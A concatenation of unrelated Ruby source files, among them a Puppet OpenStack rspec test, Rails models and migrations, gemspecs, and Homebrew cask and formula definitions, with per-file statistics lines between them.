:mysql_root_password => 'sql_pass',
}
end
let :facts do
{
:operatingsystem => 'Ubuntu',
:osfamily => 'Debian',
:operatingsystemrelease => '12.04',
:puppetversion => '2.7.x',
:memorysize => '2GB',
:processorcount => '2',
:concat_basedir => '/var/lib/puppet/concat'
}
end
context 'neutron enabled (which is the default)' do
before do
params.merge!(:cinder => false)
end
it 'raises an error if no neutron_user_password is set' do
expect { subject }.to raise_error(Puppet::Error, /neutron_user_password must be specified when neutron is configured/)
end
context 'with neutron_user_password set' do
before do
params.merge!(:neutron_user_password => 'neutron_user_password')
end
it 'raises an error if no neutron_db_password is set' do
expect { subject }.to raise_error(Puppet::Error, /neutron_db_password must be set when configuring neutron/)
end
end
context 'with neutron_user_password and neutron_db_password set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password'
)
end
it 'raises an error if no bridge_interface is set' do
expect { subject }.to raise_error(Puppet::Error, /bridge_interface must be set when configuring neutron/)
end
end
context 'with neutron_user_password, neutron_db_password, and bridge_interface set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0'
)
end
end
context 'with neutron_user_password, neutron_db_password, bridge_interface, and ovs_local_ip set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1'
)
end
it 'raises an error if no shared metadata key is set' do
expect { subject }.to raise_error(Puppet::Error, /metadata_shared_secret parameter must be set when using metadata agent/)
end
end
context 'with neutron_user_password, neutron_db_password, bridge_interface, ovs_local_ip, and shared_secret set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret'
)
end
it 'contains an openstack::neutron class' do
should contain_class('openstack::neutron').with(
:db_host => '127.0.0.1',
:rabbit_host => '127.0.0.1',
:rabbit_user => 'openstack',
:rabbit_password => 'rabbit_pw',
:rabbit_virtual_host => '/',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:bridge_uplinks => 'br-ex:eth0',
:bridge_mappings => 'default:br-ex',
:enable_ovs_agent => true,
:firewall_driver => 'neutron.agent.linux.iptables_firewall.OVSHybridIptablesFirewallDriver',
:db_name => 'neutron',
:db_user => 'neutron',
:db_password => 'neutron_db_password',
:enable_dhcp_agent => true,
:enable_l3_agent => true,
:enable_metadata_agent => true,
:auth_url => 'http://127.0.0.1:35357/v2.0',
:user_password => 'neutron_user_password',
:shared_secret => 'shared_md_secret',
:keystone_host => '127.0.0.1',
:enabled => true,
:enable_server => true,
:debug => false,
:verbose => false
)
end
end
context 'with neutron_user_password, neutron_db_password, bridge_interface, ovs_local_ip, metadata_shared_secret, and force_config_drive set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret',
:force_config_drive => true
)
end
it 'contains a nova::compute class with force_config_drive set' do
should contain_class('nova::compute').with(
:enabled => true,
:force_config_drive => true
)
end
end
context 'with neutron_user_password, neutron_db_password, bridge_interface, ovs_local_ip, bridge_mappings, bridge_uplinks, and shared_secret set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:network_vlan_ranges => '1:1000',
:bridge_mappings => ['intranet:br-intra','extranet:br-extra'],
:bridge_uplinks => ['intranet:eth1','extranet:eth2'],
:tenant_network_type => 'vlan',
:metadata_shared_secret => 'shared_md_secret'
)
end
it 'contains an openstack::neutron class' do
should contain_class('openstack::neutron').with(
:db_host => '127.0.0.1',
:rabbit_host => '127.0.0.1',
:rabbit_user => 'openstack',
:rabbit_password => 'rabbit_pw',
:rabbit_virtual_host => '/',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:network_vlan_ranges => '1:1000',
:bridge_uplinks => ['intranet:eth1','extranet:eth2'],
:bridge_mappings => ['intranet:br-intra','extranet:br-extra'],
:tenant_network_type => 'vlan',
:enable_ovs_agent => true,
:firewall_driver => 'neutron.agent.linux.iptables_firewall.OVSHybridIptablesFirewallDriver',
:db_name => 'neutron',
:db_user => 'neutron',
:db_password => 'neutron_db_password',
:enable_dhcp_agent => true,
:enable_l3_agent => true,
:enable_metadata_agent => true,
:auth_url => 'http://127.0.0.1:35357/v2.0',
:user_password => 'neutron_user_password',
:shared_secret => 'shared_md_secret',
:keystone_host => '127.0.0.1',
:enabled => true,
:enable_server => true,
:debug => false,
:verbose => false
)
end
end
end
context 'cinder enabled (which is the default)' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret'
)
end
it 'raises an error if no cinder_db_password is set' do
expect { subject }.to raise_error(Puppet::Error, /Must set cinder db password when setting up a cinder controller/)
end
context 'with cinder_db_password set' do
before do
params.merge!(:cinder_db_password => 'cinder_db_password')
end
it 'raises an error if no cinder_user_password is set' do
expect { subject }.to raise_error(Puppet::Error, /Must set cinder user password when setting up a cinder controller/)
end
end
context 'with cinder_db_password and cinder_user_password set' do
before do
params.merge!(
:cinder_db_password => 'cinder_db_password',
:cinder_user_password => 'cinder_user_password'
)
end
it 'raises an error if no cinder_user_password is set' do
should contain_class('openstack::cinder::all').with(
:bind_host => '0.0.0.0',
:keystone_auth_host => '127.0.0.1',
:keystone_password => 'cinder_user_password',
:rabbit_userid => 'openstack',
:rabbit_host => '127.0.0.1',
:db_password => 'cinder_db_password',
:db_dbname => 'cinder',
:db_user => 'cinder',
:db_type => 'mysql',
:iscsi_ip_address => '127.0.0.1',
:setup_test_volume => false,
:manage_volumes => true,
:volume_group => 'cinder-volumes',
:debug => false,
:verbose => false
)
should contain_nova_config('DEFAULT/volume_api_class').with(:value => 'nova.volume.cinder.API')
end
end
end
context 'cinder enabled and Ceph RBD as the backend' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret',
:cinder_db_password => 'cinder_db_password',
:cinder_user_password => 'cinder_user_password',
:cinder_volume_driver => 'rbd',
:cinder_rbd_secret_uuid => 'e80afa94-a64c-486c-9e34-d55e85f26406'
)
end
it 'should have cinder::volume::rbd' do
should contain_class('cinder::volume::rbd').with(
:rbd_pool => 'volumes',
:rbd_user => 'volumes',
:rbd_secret_uuid => 'e80afa94-a64c-486c-9e34-d55e85f26406'
)
end
end
context 'cinder and neutron enabled (which is the default)' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret',
:cinder_db_password => 'cinder_db_password',
:cinder_user_password => 'cinder_user_password'
)
end
it 'should have openstack::db::mysql configured' do
should contain_class('openstack::db::mysql').with(
:charset => 'latin1',
:mysql_root_password => 'sql_pass',
:mysql_bind_address => '0.0.0.0',
:mysql_account_security => true,
:keystone_db_user => 'keystone',
:keystone_db_password => 'keystone_pass',
:keystone_db_dbname => 'keystone',
:glance_db_user => 'glance',
:glance_db_password => 'glance_pass',
:glance_db_dbname => 'glance',
:nova_db_user => 'nova',
:nova_db_password => 'nova_pass',
:nova_db_dbname => 'nova',
:cinder => true,
:cinder_db_user => 'cinder',
:cinder_db_password => 'cinder_db_password',
:cinder_db_dbname => 'cinder',
:neutron => true,
:neutron_db_user => 'neutron',
:neutron_db_password => 'neutron_db_password',
:neutron_db_dbname => 'neutron',
:allowed_hosts => '%',
:enabled => true
)
end
it 'should have openstack::keystone configured' do
should contain_class('openstack::keystone').with(
:debug => false,
:verbose => false,
:db_type => 'mysql',
:db_host => '127.0.0.1',
:db_password => 'keystone_pass',
:db_name => 'keystone',
:db_user => 'keystone',
:admin_token => 'keystone_admin_token',
:admin_tenant => 'admin',
:admin_email => 'some_user@some_fake_email_address.foo',
:admin_password => 'ChangeMe',
:public_address => '10.0.0.1',
:internal_address => '10.0.0.1',
:admin_address => '10.0.0.1',
:region => 'RegionOne',
:glance_user_password => 'glance_pass',
:nova_user_password => 'nova_pass',
:cinder => true,
:cinder_user_password => 'cinder_user_password',
:neutron => true,
:neutron_user_password => 'neutron_user_password',
:enabled => true,
:bind_host => '0.0.0.0'
)
end
it 'should have openstack::glance configured' do
should contain_class('openstack::glance').with(
:debug => false,
:verbose => false,
:db_type => 'mysql',
:db_host => '127.0.0.1',
:keystone_host => '127.0.0.1',
:db_user => 'glance',
:db_name => 'glance',
:db_password => 'glance_pass',
:user_password => 'glance_pass',
:backend => 'file',
:enabled => true
)
end
it 'should have nova::compute configured' do
should contain_class('nova::compute').with(
:enabled => true,
:vnc_enabled => true,
:vncserver_proxyclient_address => '10.0.0.1',
:vncproxy_host => '10.0.0.1'
)
end
it 'should have nova::compute::libvirt configured' do
should contain_class('nova::compute::libvirt').with(
:libvirt_type => 'kvm',
:vncserver_listen => '10.0.0.1',
:migration_support => false
)
end
it 'should have openstack::nova::controller configured' do
should contain_class('openstack::nova::controller').with(
:db_host => '127.0.0.1',
:network_manager => 'nova.network.manager.FlatDHCPManager',
:network_config => {},
:floating_range => false,
:fixed_range => '10.0.0.0/24',
:public_address => '10.0.0.1',
:admin_address => false,
:internal_address => '10.0.0.1',
:auto_assign_floating_ip => false,
:create_networks => true,
:num_networks => 1,
:multi_host => false,
:public_interface => 'eth0',
:private_interface => false,
:neutron => true,
:neutron_user_password => 'neutron_user_password',
:metadata_shared_secret => 'shared_md_secret',
:nova_admin_tenant_name => 'services',
:nova_admin_user => 'nova',
:nova_user_password => 'nova_pass',
:nova_db_password => 'nova_pass',
:nova_db_user => 'nova',
:nova_db_dbname => 'nova',
:enabled_apis => 'ec2,osapi_compute,metadata',
:rabbit_user => 'openstack',
:rabbit_password => 'rabbit_pw',
:rabbit_virtual_host => '/',
:glance_api_servers => '10.0.0.1:9292',
:vnc_enabled => true,
:vncproxy_host => '10.0.0.1',
:debug => false,
:verbose => false,
:enabled => true
)
end
it 'should configure horizon' do
should contain_class('openstack::horizon').with(
:secret_key => 'secret_key',
:cache_server_ip => '127.0.0.1',
:cache_server_port => 11211,
:horizon_app_links => ''
)
end
end
context 'without neutron' do
before do
params.merge!(
:cinder => false,
:neutron => false,
:private_interface => 'eth1')
end
context 'without fixed_range' do
before do
params.merge!(
:fixed_range => false
)
end
it 'raises an error if no fixed_range is given' do
expect { subject }.to raise_error(Puppet::Error, /Must specify the fixed range when using nova-network/)
end
end
context 'without private_interface' do
before do
params.merge!(:private_interface => false)
end
it 'raises an error if no private_interface is given' do
expect { subject }.to raise_error(Puppet::Error, /private interface must be set when nova networking is used/)
end
end
context 'with multi_host enabled' do
before do
params.merge!(
:multi_host => true
)
end
it 'sets send_arp_for_ha' do
should contain_nova_config('DEFAULT/send_arp_for_ha').with(:value => true)
end
end
context 'with multi_host disabled' do
before do
params.merge!(
:multi_host => false
)
end
it 'unsets multi_host and send_arp_for_ha' do
should contain_nova_config('DEFAULT/multi_host').with(:value => false)
should contain_nova_config('DEFAULT/send_arp_for_ha').with(:value => false)
end
end
it 'configures nova::network' do
should contain_class('nova::network').with(
:private_interface => 'eth1',
:public_interface => 'eth0',
:fixed_range => '10.0.0.0/24',
:floating_range => false,
:network_manager => 'nova.network.manager.FlatDHCPManager',
:config_overrides => {},
:create_networks => true,
:enabled => true,
:install_service => true
)
end
end
context 'glance enabled and rbd as the backend' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret',
:cinder_db_password => 'cinder_db_password',
:cinder_user_password => 'cinder_user_password',
:glance_backend => 'rbd'
)
end
it 'should have glance::backend::rbd with default user/pool' do
should contain_class('glance::backend::rbd').with(
:rbd_store_user => 'images',
:rbd_store_pool => 'images'
)
end
end
end
| 37.796578 | 152 | 0.548212 |
ed81908628446c58d1267e983707f2fd1d6c3c91 | 61 | class NericaRiceInputsController < ApplicationController
end
| 20.333333 | 56 | 0.901639 |
b970618d245bcec6ef195bea9334e8fd126e4a3e | 335 | require 'spec_helper'
describe OptaSD::Soccer::TournamentSchedule do
before do
@tournament_id = "bnni2f2e6ii20b1wmzcsbpj2o"
end
it "get match_facts by resource" do
ranking = OptaSD::Soccer::TournamentSchedule.new.resource(@tournament_id)#.get
# sdapidocumentation Account not Authorised for this request
end
end
| 23.928571 | 82 | 0.767164 |
e2babbdd6096e1002f08513c6de1c10d364c0dd0 | 524 | # == Schema Information
#
# Table name: assets
#
# id :integer not null, primary key
# theme_id :integer
# content_type :string
# public_url :string
# size :integer
# key :string
# created_at :datetime not null
# updated_at :datetime not null
# file :string
#
# Indexes
#
# index_assets_on_key (key)
# index_assets_on_theme_id (theme_id)
#
class Asset < ActiveRecord::Base
mount_uploader :file, AssetUploader
belongs_to :theme
end
| 20.96 | 55 | 0.616412 |
acc915939faf599c5063a48f8e4375eb4d673a33 | 1,191 | # encoding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'activejob/workers_lock/version'
Gem::Specification.new do |s|
s.name = "activejob-workers-lock"
s.version = Activejob::WorkersLock::VERSION
s.authors = ["jpatters"]
s.email = ["[email protected]"]
s.summary = %q{Adapt resque-workers-lock to work with ActiveJob}
s.description = ''
s.homepage = 'http://github.com/jpatters/activejob-workers-lock'
s.license = "MIT"
s.files = %w( README.md Rakefile Gemfile LICENSE.txt )
s.files += Dir.glob("lib/**/*")
s.files += Dir.glob("test/**/*")
s.executables = s.files.grep(%r{^bin/}) { |f| File.basename(f) }
s.test_files = s.files.grep(%r{^(test|spec|features)/})
s.require_paths = ["lib"]
s.add_dependency 'activejob', '>= 4.2'
s.add_dependency 'activesupport', '>= 4.2'
s.add_dependency "resque-workers-lock", "~> 2.0"
s.add_development_dependency "bundler", "~> 1.7"
s.add_development_dependency "rake", "~> 10.0"
s.add_development_dependency "rails"
s.add_development_dependency "sqlite3"
end
| 36.090909 | 72 | 0.639798 |
626d2813a9de7780198288023e2b7baa8d75a661 | 559 | cask 'shortcat' do
version '0.7.10'
sha256 '02744ac4837cf50aee8a2441c660ea65cea21fd6740006dbd13e5ca27c70ec6b'
url "https://files.shortcatapp.com/v#{version}/Shortcat.zip"
appcast 'https://shortcatapp.com/updates/appcast.xml'
name 'Sproutcube Shortcat'
homepage 'https://shortcatapp.com/'
app 'Shortcat.app'
zap trash: [
'~/Library/Application Support/Shortcat',
'~/Library/Cookies/com.sproutcube.Shortcat.binarycookies',
'~/Library/Preferences/com.sproutcube.Shortcat.plist',
]
end
| 31.055556 | 75 | 0.685152 |
ed0a305e0ce63da95ac9b2c533db5d7e4495011b | 163 | json.extract! bar_code, :id, :asn, :part_code, :qty, :date, :lot_size, :target, :location, :created_at, :updated_at
json.url bar_code_url(bar_code, format: :json)
| 54.333333 | 115 | 0.730061 |
e9e0f07c3aa4c7a186db8493d394fb19bfe8d413 | 348 | Sequel.migration do
up do
alter_table(:govt_inspection_sheets) do
add_column :tripsheet_loaded_at, DateTime
add_column :tripsheet_offloaded, :boolean, default: false
end
end
down do
alter_table(:govt_inspection_sheets) do
drop_column :tripsheet_loaded_at
drop_column :tripsheet_offloaded
end
end
end | 23.2 | 63 | 0.738506 |
e2095135932b4e9e83099d57ba32ae4ebd8583e4 | 747 | require 'spec_helper'
describe 'security_tidy_all_files' do
let(:msg) { 'Purging all files, be warned!' }
context 'with fix disabled' do
context 'code having unspecific tidy' do
let(:code) { "
tidy { '/usr/local':
}
" }
it 'should detect a single problem' do
expect(problems).to have(1).problem
end
it 'should create a warning' do
expect(problems).to contain_warning(msg).on_line(2).in_column(20)
end
end
context 'code having specific tidy' do
let(:code) { "
tidy { '/tmp':
age => '1w',
matches => [ '[0-9]pub*.tmp', '*.temp', 'tmpfile?' ]
}
" }
it 'should not detect any problems' do
expect(problems).to have(0).problems
end
end
end
end
| 20.189189 | 73 | 0.598394 |
622cf21d7bfb19465d979397d5f29ec305ca41cd | 7,646 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2017_03_01
module Models
#
# Request Report data.
#
class RequestReportRecordContract
include MsRestAzure
# @return [String] API identifier path. /apis/{apiId}
attr_accessor :api_id
# @return [String] Operation identifier path.
# /apis/{apiId}/operations/{operationId}
attr_accessor :operation_id
# @return [String] Product identifier path. /products/{productId}
attr_accessor :product_id
# @return [String] User identifier path. /users/{userId}
attr_accessor :user_id
# @return [String] The HTTP method associated with this request..
attr_accessor :method
# @return [String] The full URL associated with this request.
attr_accessor :url
# @return [String] The client IP address associated with this request.
attr_accessor :ip_address
# @return [String] The HTTP status code received by the gateway as a
# result of forwarding this request to the backend.
attr_accessor :backend_response_code
# @return [Integer] The HTTP status code returned by the gateway.
attr_accessor :response_code
# @return [Integer] The size of the response returned by the gateway.
attr_accessor :response_size
# @return [DateTime] The date and time when this request was received by
# the gateway in ISO 8601 format.
attr_accessor :timestamp
# @return [String] Specifies if response cache was involved in generating
# the response. If the value is none, the cache was not used. If the
# value is hit, cached response was returned. If the value is miss, the
# cache was used but lookup resulted in a miss and request was fulfilled
# by the backend.
attr_accessor :cache
# @return [Float] The total time it took to process this request.
attr_accessor :api_time
# @return [Float] he time it took to forward this request to the backend
# and get the response back.
attr_accessor :service_time
# @return [String] Azure region where the gateway that processed this
# request is located.
attr_accessor :api_region
# @return [String] Subscription identifier path.
# /subscriptions/{subscriptionId}
attr_accessor :subscription_id
# @return [String] Request Identifier.
attr_accessor :request_id
# @return [Integer] The size of this request..
attr_accessor :request_size
#
# Mapper for RequestReportRecordContract class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'RequestReportRecordContract',
type: {
name: 'Composite',
class_name: 'RequestReportRecordContract',
model_properties: {
api_id: {
client_side_validation: true,
required: false,
serialized_name: 'apiId',
type: {
name: 'String'
}
},
operation_id: {
client_side_validation: true,
required: false,
serialized_name: 'operationId',
type: {
name: 'String'
}
},
product_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'productId',
type: {
name: 'String'
}
},
user_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'userId',
type: {
name: 'String'
}
},
method: {
client_side_validation: true,
required: false,
serialized_name: 'method',
type: {
name: 'String'
}
},
url: {
client_side_validation: true,
required: false,
serialized_name: 'url',
type: {
name: 'String'
}
},
ip_address: {
client_side_validation: true,
required: false,
serialized_name: 'ipAddress',
type: {
name: 'String'
}
},
backend_response_code: {
client_side_validation: true,
required: false,
serialized_name: 'backendResponseCode',
type: {
name: 'String'
}
},
response_code: {
client_side_validation: true,
required: false,
serialized_name: 'responseCode',
type: {
name: 'Number'
}
},
response_size: {
client_side_validation: true,
required: false,
serialized_name: 'responseSize',
type: {
name: 'Number'
}
},
timestamp: {
client_side_validation: true,
required: false,
serialized_name: 'timestamp',
type: {
name: 'DateTime'
}
},
cache: {
client_side_validation: true,
required: false,
serialized_name: 'cache',
type: {
name: 'String'
}
},
api_time: {
client_side_validation: true,
required: false,
serialized_name: 'apiTime',
type: {
name: 'Double'
}
},
service_time: {
client_side_validation: true,
required: false,
serialized_name: 'serviceTime',
type: {
name: 'Double'
}
},
api_region: {
client_side_validation: true,
required: false,
serialized_name: 'apiRegion',
type: {
name: 'String'
}
},
subscription_id: {
client_side_validation: true,
required: false,
serialized_name: 'subscriptionId',
type: {
name: 'String'
}
},
request_id: {
client_side_validation: true,
required: false,
serialized_name: 'requestId',
type: {
name: 'String'
}
},
request_size: {
client_side_validation: true,
required: false,
serialized_name: 'requestSize',
type: {
name: 'Number'
}
}
}
}
}
end
end
end
end
| 31.081301 | 79 | 0.485352 |
f7ab9506bbf2bcd4016868629d83cb90e273fa02 | 559 | require 'spec_helper'
describe ActsAsTenant::Configuration do
describe 'no configuration given' do
before do
ActsAsTenant.configure
end
it 'provides defaults' do
expect(ActsAsTenant.configuration.require_tenant).not_to be_truthy
end
end
describe 'with config block' do
after do
ActsAsTenant.configure
end
it 'stores config' do
ActsAsTenant.configure do |config|
config.require_tenant = true
end
expect(ActsAsTenant.configuration.require_tenant).to eq(true)
end
end
end
| 19.275862 | 72 | 0.699463 |
b93c9a9fb5d89782205117eb06edbe0b3d8d340a | 252 | class CreateMeasurements < ActiveRecord::Migration[6.1]
def change
create_table :measurements do |t|
t.integer :value
t.timestamp :date
t.references :measure, null: false, foreign_key: true
t.timestamps
end
end
end
| 21 | 59 | 0.678571 |
bf1798175e661a4e8b98b74ae25c920d87bb83ae | 659 | module Shaf
module Tasks
class RoutesTask
extend Rake::DSL
desc 'List path helpers'
task :routes do
require 'shaf/utils'
require 'config/database'
extend Shaf::Utils
bootstrap
Shaf::ApiRoutes::Registry.controllers.each do |controller|
puts "\n#{controller}:"
Shaf::ApiRoutes::Registry.routes_for(controller) do |methods, template, symbol|
puts format(
' %-50<symbol>s%-30<methods>s%<template>s',
{symbol: symbol, methods: methods.join(' | '), template: template}
)
end
end
end
end
end
end
| 24.407407 | 89 | 0.561457 |
08d47ccd1d610adbe6ca74e73115cec44eae7b05 | 993 | ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'
require 'rails/test_help'
require 'minitest/reporters'
Minitest::Reporters.use!
class ActiveSupport::TestCase
# Run tests in parallel with specified workers
parallelize(workers: :number_of_processors)
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Returns true if a test user is logged in.
def is_logged_in?
!session[:user_id].nil?
end
# Log in as a particular user.
def log_in_as(user)
session[:user_id] = user.id
end
# Add more helper methods to be used by all tests here...
include ApplicationHelper
end
class ActionDispatch::IntegrationTest
# Log in as a particular user.
def log_in_as(user, password: 'password', remember_me: '1')
post login_path, params: {session: {email: user.email,
password: password,
remember_me: remember_me}}
end
end | 27.583333 | 82 | 0.676737 |
87d616fdba200351f9c20d11fa908db75882af79 | 851 | Pod::Spec.new do |s|
s.name = "MaterialComponentsCatalog"
s.version = "35.3.0"
s.authors = "The Material Components authors."
s.summary = "A collection of stand-alone production-ready UI libraries focused on design details."
s.homepage = "https://github.com/material-components/material-components-ios"
s.license = 'Apache 2.0'
s.source = { :git => "https://github.com/material-components/material-components-ios.git", :tag => "v#{s.version}" }
s.platform = :ios, '8.0'
s.requires_arc = true
s.source_files = 'components/*/examples/*.{h,m,swift}', 'components/*/examples/supplemental/*.{h,m,swift}'
s.resources = ['components/*/examples/resources/*']
s.dependency 'MaterialComponents'
s.public_header_files = 'components/*/examples/*.h', 'components/*/examples/supplemental/*.h'
end
| 53.1875 | 124 | 0.670975 |
b9fae129a6214138ed7bac3386605953b993e289 | 862 | $:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "devise_activity/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "devise-activity"
s.version = DeviseActivity::VERSION
s.authors = ["M Shahzad Tariq"]
s.email = ["[email protected]"]
s.homepage = "http://github.com/mshahzadtariq/devise-activity"
s.summary = "Store devise user session and page visiting history with duration and date/time in rails"
s.description = "Store devise user session and page visiting history with duration and date/time in rails"
s.license = "MIT"
s.files = Dir["{app,lib}/**/*", "MIT-LICENSE", "Rakefile", "README.rdoc"]
s.test_files = Dir["test/**/*"]
s.add_dependency "rails", '>= 3'
#s.add_development_dependency "sqlite3"
end
| 35.916667 | 108 | 0.683295 |
f86ee8d7f83f5f94284c840114080ebb704af393 | 3,295 | class Tm < Formula
desc "TriggerMesh CLI to work with knative objects"
homepage "https://triggermesh.com"
url "https://github.com/triggermesh/tm/archive/v1.4.0.tar.gz"
sha256 "b1828e354d1e50de6529506b4403ddc44df7620ff75b4a8d8fa63e44816e8778"
license "Apache-2.0"
head "https://github.com/triggermesh/tm.git"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "62e9de27ed9454818993c327ee536dcb7aecebfc1e696766c230fec78d8f4260"
sha256 cellar: :any_skip_relocation, big_sur: "53f371fb6b81dca5a459655162104bc86e3543414149140f6ad6f710a5fc9274"
sha256 cellar: :any_skip_relocation, catalina: "d34ebf03ddac7996b5c6499c32fdbca55f77eace1312bcd99acf3cce212b8cee"
sha256 cellar: :any_skip_relocation, mojave: "4b06cbfac7163ae780067d15ce3ea9a29c881cd8e161ae080cb27414cd8103c6"
end
depends_on "go" => :build
def install
ldflags = %W[
-s -w
-X github.com/triggermesh/tm/cmd.version=v#{version}
]
system "go", "build", *std_go_args, "-ldflags", ldflags.join(" ")
end
test do
(testpath/"kubeconfig").write <<~EOS
apiVersion: v1
clusters:
- cluster:
certificate-authority-data: test
server: http://127.0.0.1:8080
name: test
contexts:
- context:
cluster: test
user: test
name: test
current-context: test
kind: Config
preferences: {}
users:
- name: test
user:
token: test
EOS
ENV["KUBECONFIG"] = testpath/"kubeconfig"
# version
version_output = shell_output("#{bin}/tm version")
assert_match "Triggermesh CLI, version v#{version}", version_output
# node
system "#{bin}/tm", "generate", "node", "foo-node"
assert_predicate testpath/"foo-node/serverless.yaml", :exist?
assert_predicate testpath/"foo-node/handler.js", :exist?
runtime = "https://raw.githubusercontent.com/triggermesh/knative-lambda-runtime/master/node10/runtime.yaml"
yaml = File.read("foo-node/serverless.yaml")
assert_match "runtime: #{runtime}", yaml
# python
system "#{bin}/tm", "generate", "python", "foo-python"
assert_predicate testpath/"foo-python/serverless.yaml", :exist?
assert_predicate testpath/"foo-python/handler.py", :exist?
runtime = "https://raw.githubusercontent.com/triggermesh/knative-lambda-runtime/master/python37/runtime.yaml"
yaml = File.read("foo-python/serverless.yaml")
assert_match "runtime: #{runtime}", yaml
# go
system "#{bin}/tm", "generate", "go", "foo-go"
assert_predicate testpath/"foo-go/serverless.yaml", :exist?
assert_predicate testpath/"foo-go/main.go", :exist?
runtime = "https://raw.githubusercontent.com/triggermesh/knative-lambda-runtime/master/go/runtime.yaml"
yaml = File.read("foo-go/serverless.yaml")
assert_match "runtime: #{runtime}", yaml
# ruby
system "#{bin}/tm", "generate", "ruby", "foo-ruby"
assert_predicate testpath/"foo-ruby/serverless.yaml", :exist?
assert_predicate testpath/"foo-ruby/handler.rb", :exist?
runtime = "https://raw.githubusercontent.com/triggermesh/knative-lambda-runtime/master/ruby25/runtime.yaml"
yaml = File.read("foo-ruby/serverless.yaml")
assert_match "runtime: #{runtime}", yaml
end
end
| 35.815217 | 122 | 0.691047 |
f83164171b7863bdb4c347f0d462e47c12148536 | 163 | require 'nokogiri'
require 'pry'
require 'open-uri'
require_relative "daily_deal/version"
require_relative "./daily_deal/cli"
require_relative "./daily_deal/deal"
| 23.285714 | 37 | 0.803681 |
79c38cdf8e5b4bed06a69270b21f6c8410b864ca | 102 | require 'spec_helper_acceptance'
# Ensure IPv6 router advertisements are not accepted - Section 3.3.1 | 34 | 68 | 0.813725 |
33e0f150fe14445f6a5e8e2a10764e1553f903da | 730 | #
# Transcript.rb
# briquette
#
# Created by Dominic Dagradi on 7/31/11.
# Copyright 2011 Bearded. All rights reserved.
#
class Transcript
attr_accessor :room
attr_accessor :date
attr_accessor :site
attr_accessor :controller
def initialize _room, _date, sender
@room = _room
@date = Time.parse _date
@controller = sender
end
def loadTranscript
# get transcript from campfire
url = "/room/#{@room.id}/transcript/#{@date.year}/#{@date.month}/#{@date.day}.json"
request = Request.get(url, delegate:self, callback:"transcriptLoaded:", site:@room.site, options:{})
end
def transcriptLoaded request
@controller.transcriptLoaded request.responseHash["messages"]
end
end | 22.8125 | 104 | 0.69589 |
03ee69b2399f215615ef287172868e8e0fd334d4 | 469 | module ReverseMarkdown
module Converters
class Strong < Base
def convert(node)
content = treat_children(node)
if content.strip.empty? || already_strong?(node)
content
else
"**#{content}**"
end
end
def already_strong?(node)
node.ancestors('strong').size > 0 || node.ancestors('b').size > 0
end
end
register :strong, Strong.new
register :b, Strong.new
end
end
| 21.318182 | 73 | 0.573561 |
edf4122b4c09ccc833f1dd4d845b28d8f5245338 | 228 | class Tapaal < Cask
url 'http://www.tapaal.net/fileadmin/download/tapaal-2.4/tapaal-2.4.2-mac.dmg'
homepage 'http://www.tapaal.net'
version '2.4.2'
sha1 '5590ebea1dee27d43ef1268f98c1e8683e64658b'
link 'Tapaal.app'
end
| 28.5 | 80 | 0.736842 |
d5db1c900575c4372d685bd0cc634a78b2b62ff7 | 640 | cask 'devonthink' do
version '2.11.2'
sha256 'd1ba068f0830e85457eedcf53f8c6843182fc3446d5de27b6f3cff8c2204ebfd'
# amazonaws.com/DTWebsiteSupport was verified as official when first introduced to the cask
url "https://s3.amazonaws.com/DTWebsiteSupport/download/devonthink/#{version}/DEVONthink_Personal.app.zip"
appcast 'https://www.devontechnologies.com/fileadmin/templates/filemaker/sparkle.php?product=217255&format=xml'
name 'DEVONthink Personal'
homepage 'https://www.devontechnologies.com/products/devonthink/devonthink-personal.html'
auto_updates true
depends_on macos: '>= :mavericks'
